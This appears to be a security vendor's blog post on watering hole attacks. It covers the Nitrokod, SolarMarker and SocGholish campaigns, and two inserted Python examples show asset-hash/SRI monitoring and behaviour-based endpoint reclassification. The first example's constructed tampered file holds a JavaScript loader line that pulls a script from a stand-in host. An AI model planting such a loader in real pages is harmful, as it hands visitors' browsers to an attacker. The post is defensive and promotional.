WatchGuard Blog

Watering hole attacks vs. advanced endpoint protection


In a watering hole attack, threat actors usually have to follow a series of steps. First, they need to research the target and make sure they know the type of website the potential victim frequents. Then, they attempt to infect it with malicious code so that when the victim visits it, the website exploits a vulnerability in the browser or convinces them to download a file that compromises the user device.  

Watering hole attack: What is it?

This type of attack is designed to target employees in a specific industry or user group and uses the websites they visit regularly to lure them into a trap that provides access to a company's corporate network. Data theft, economic loss, and reputational damage are often the main consequences of watering hole attacks.  

While these threats closely resemble supply chain attacks, they are not the same. In both cases attackers compromise a third-party service in order to infect other systems. However, a supply chain attack typically compromises a product the target has purchased or a service it uses, distributing malware through the "weakest" link of an organization's network, such as a supplier, vendor or partner, whereas a watering hole attack infects neutral websites that the target merely visits.

Three recent examples of watering hole attacks:

1. Nitrokod and fake Google Translate for desktop

In late July 2022, a cryptocurrency mining malware campaign was detected that infected devices in 11 countries. The threat actor was a software developer called Nitrokod that offered free versions of popular software applications that do not have an official desktop version. Its imitation of the translation utility, built from the official Google Translate web pages and a Chromium-based framework, was its most popular offering: it was available on freeware websites and ranked high in search results for "Google Translate desktop download". The applications were trojanized, and once the software was installed on the device the infection process stayed dormant for several weeks so that it remained unnoticed. After the dormant interval, the malware kicked in and victims received an updated file which loaded a series of four droppers onto the device over the course of a few days. The last dropper deployed the Monero-centric XMRig cryptominer and executed it. While this was happening, Google Translate continued to function properly and security analyses raised no red flags. This tactic allowed the campaign to operate under the radar for years.

2. SolarMarker malware 

In September 2022, the SolarMarker group compromised a vulnerable WordPress website to entice its victims to download fake Chrome browser updates. This campaign targeted a global tax consulting organization with a presence in the US, Canada, UK and Europe. In this case, the victim was a company employee who was searching on Google for medical equipment from a specific named manufacturer. Once the employee accessed the compromised website, he was prompted to download an update to the Chrome web browser. The employee then downloaded and executed SolarMarker, which was disguised as that update. The fake update was tailored to the browser the victim was using when accessing the infected website: had the user been on another browser, it would have impersonated a Firefox or Edge update instead.

3. SocGholish malware on US news websites  

In November 2022, a criminal group compromised a content provider company responsible for supplying video content and advertising to major US media outlets, in order to deploy malware on their websites. During this campaign, 250 national and regional newspaper web portals in the country were targeted. The malware, called SocGholish and first seen in 2018, was injected into a benign JavaScript file that loaded on the media websites and convinced visitors to download a fake browser update. As in the previous case, the fake update was tailored to the browser the visitor was using. Once the attackers gained initial access to the networks, this could be used as an avenue to deploy ransomware, a tactic we have seen previously.  
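Both the SolarMarker and SocGholish cases above hinge on a legitimately served JavaScript file being altered without the site operator noticing. As an added example that is not part of the original post (the asset paths, file contents and the appended loader line are all constructed), this Python script shows two site-side controls a defender can apply: pinning a SHA-256 baseline of the served assets and diffing it on every check, and emitting Subresource Integrity (SRI) values for the `<script>` tags so that a browser refuses to execute a script whose bytes no longer match the tag.

```python
import base64
import hashlib

# Constructed sample: the JavaScript assets a site serves, keyed by path.
# These are not the real files from either campaign described above.
BASELINE_ASSETS = {
    "/static/player.js": b"function play(id){return document.getElementById(id);}\n",
    "/static/ads.js": b"window.adSlots = [];\n",
}

# The same assets at a later check. One benign file has had a loader line
# appended (constructed text, not a real indicator), and a new file appeared.
CURRENT_ASSETS = {
    "/static/player.js": b"function play(id){return document.getElementById(id);}\n"
                         b"var s=document.createElement('script');"
                         b"s.src='https://cdn.example.invalid/u.js';"
                         b"document.head.appendChild(s);\n",
    "/static/ads.js": b"window.adSlots = [];\n",
    "/static/new.js": b"// file that was not in the baseline\n",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(assets: dict) -> dict:
    """Pin a hash for every asset at a moment the site is known to be clean."""
    return {path: sha256_hex(content) for path, content in assets.items()}


def diff_assets(baseline: dict, current: dict) -> dict:
    """Compare pinned hashes with what is served now; any change is an alert."""
    modified = [p for p in baseline
                if p in current and sha256_hex(current[p]) != baseline[p]]
    added = [p for p in current if p not in baseline]
    removed = [p for p in baseline if p not in current]
    return {"modified": sorted(modified),
            "added": sorted(added),
            "removed": sorted(removed)}


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value: '<algo>-<base64 digest>' for an integrity attribute."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Render a script tag the browser will only honour if the bytes still match."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_ASSETS)
    changes = diff_assets(baseline, CURRENT_ASSETS)
    for kind, paths in changes.items():
        for p in paths:
            print(f"ALERT {kind}: {p}")
    for path, content in BASELINE_ASSETS.items():
        print(script_tag(path, content))
```

The hash diff is detection after the fact: it tells you the file changed, not that the change is malicious, so every modified or added asset needs a review. SRI is closer to prevention, but it only covers scripts referenced from tags that carry the attribute, and it deliberately breaks the page whenever the upstream provider ships a legitimate update, so the integrity values have to be regenerated as part of the deployment process rather than set once.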

Endpoint protection: critical defense against a watering hole attack 

Watering hole attacks have a high success rate because they compromise legitimate websites that users trust, so even the most informed and careful employees can fall into the trap. This is why an endpoint protection solution that provides continuous monitoring and prevents the execution of unknown processes is needed. However, bearing in mind that in such an attack the malicious application can pass as legitimate, the technology used to defend against it must protect users against advanced threats, advanced persistent threats (APT), zero-day malware and ransomware, among other sophisticated threats. Using AI and automation is beneficial for performing prevention, detection, containment and response actions. In addition, behavioral analysis is ideal for detecting whether any malicious actors are present within the network. Together, these functions provide comprehensive security capable of fending off a watering hole attack.  

It is critical to adopt a zero-trust approach, ideally with managed services such as the WatchGuard Zero-Trust Application Service (see its Feature Brief), which classifies 100% of applications as either malware or trusted and monitors the activity of every kind of application at the endpoint. A zero-trust approach can prevent sophisticated threats such as supply chain attacks and watering hole attacks from executing, by observing anomalous behavior in seemingly legitimate software and reclassifying applications as soon as they perform activities typically used by threat actors. There is no doubt that cybercriminals are deploying tactics that are increasingly complex and difficult to detect, but with the right protection, combining AI with a zero-trust approach, it is possible to deal with them and keep corporate networks secure.  
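The two paragraphs above describe the endpoint side of the defense: unknown processes are not allowed to run until they are classified, and an application that was classified as trusted is reclassified the moment it behaves like an attacker's tool. As an added example that is not part of the original post and is not WatchGuard's product logic, this Python script models that policy over constructed process telemetry. The hashes, file paths and activity names are made up for the example; the scenarios mirror the cases above (a browser launching an unknown "update" binary, and an application that looked legitimate at install time later fetching and running further stages).

```python
from dataclasses import dataclass

# Constructed reputation data. The hash values are placeholders, not real
# indicators from any campaign.
TRUSTED_HASHES = {
    "1111aaaa": "chrome.exe",
    "2222bbbb": "GoogleTranslateDesktop.exe",  # classified trusted at install time
}
KNOWN_MALWARE_HASHES = {"9999ffff"}

# Activities that cause an already-trusted application to be reclassified.
SUSPICIOUS_ACTIVITIES = {
    "download_and_run_stage": "fetches and executes additional payloads",
    "mass_file_encryption": "ransomware-like rewriting of user files",
    "crypto_mining": "sustained mining workload",
}


@dataclass
class ProcessEvent:
    pid: int
    image: str
    sha256: str
    parent_image: str


@dataclass
class ActivityEvent:
    pid: int
    activity: str


@dataclass
class Decision:
    pid: int
    verdict: str   # "trusted", "blocked" or "malware"
    reason: str


def classify_start(ev: ProcessEvent, reputation: dict) -> Decision:
    """Zero-trust start decision: only a known-trusted hash is allowed to run."""
    if ev.sha256 in KNOWN_MALWARE_HASHES:
        return Decision(ev.pid, "malware", "hash on known-malware list")
    if ev.sha256 in reputation:
        return Decision(ev.pid, "trusted", f"hash classified as trusted ({reputation[ev.sha256]})")
    # Deny by default: an unclassified binary is held, whoever its parent is.
    return Decision(ev.pid, "blocked",
                    f"unknown hash launched by {ev.parent_image}; held for classification")


def evaluate(events: list) -> list:
    """Replay telemetry in order, tracking trusted processes and reclassifying on behaviour."""
    reputation = dict(TRUSTED_HASHES)   # local copy so reclassification does not leak between runs
    running = {}                        # pid -> ProcessEvent for processes allowed to run
    decisions = []
    for ev in events:
        if isinstance(ev, ProcessEvent):
            d = classify_start(ev, reputation)
            if d.verdict == "trusted":
                running[ev.pid] = ev
            decisions.append(d)
        elif isinstance(ev, ActivityEvent):
            proc = running.get(ev.pid)
            if proc is None:
                continue   # blocked processes never got to act
            if ev.activity in SUSPICIOUS_ACTIVITIES:
                # Behavioural reclassification: drop the trusted verdict for this hash.
                reputation.pop(proc.sha256, None)
                del running[ev.pid]
                decisions.append(Decision(
                    ev.pid, "malware",
                    f"reclassified: {SUSPICIOUS_ACTIVITIES[ev.activity]}"))
    return decisions


# Constructed telemetry sequence.
SAMPLE_EVENTS = [
    ProcessEvent(100, r"C:\Program Files\Google\Chrome\chrome.exe", "1111aaaa", "explorer.exe"),
    # Fake browser update downloaded from a compromised site: unknown hash, blocked.
    ProcessEvent(101, r"C:\Users\jdoe\Downloads\ChromeUpdate.exe", "abcd0000", "chrome.exe"),
    # Trojanized application that was trusted when installed.
    ProcessEvent(102, r"C:\Users\jdoe\AppData\Local\GoogleTranslateDesktop.exe", "2222bbbb", "explorer.exe"),
    ActivityEvent(102, "download_and_run_stage"),
    # Its dropped stage matches a known-malware hash.
    ProcessEvent(103, r"C:\Users\jdoe\AppData\Local\stage2.exe", "9999ffff", "GoogleTranslateDesktop.exe"),
]


def verdicts(events: list) -> list:
    return [d.verdict for d in evaluate(events)]


if __name__ == "__main__":
    for d in evaluate(SAMPLE_EVENTS):
        print(f"pid={d.pid} {d.verdict:8} {d.reason}")
```

The point the model makes is that the start-time verdict and the behavioural verdict are separate: the dormant trojanized application passes the first check exactly as the page describes, and is only caught when it starts fetching and running further stages, which is why continuous monitoring matters as much as the initial classification. A real product also has to decide what "blocked" means for the user (quarantine, prompt, or silent hold) and how long an unknown binary may wait for a cloud verdict; those policy choices are outside this example.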

Interested in learning more about how WatchGuard Endpoint Security helps you avoid attacks like this one? Visit our website and find all the information.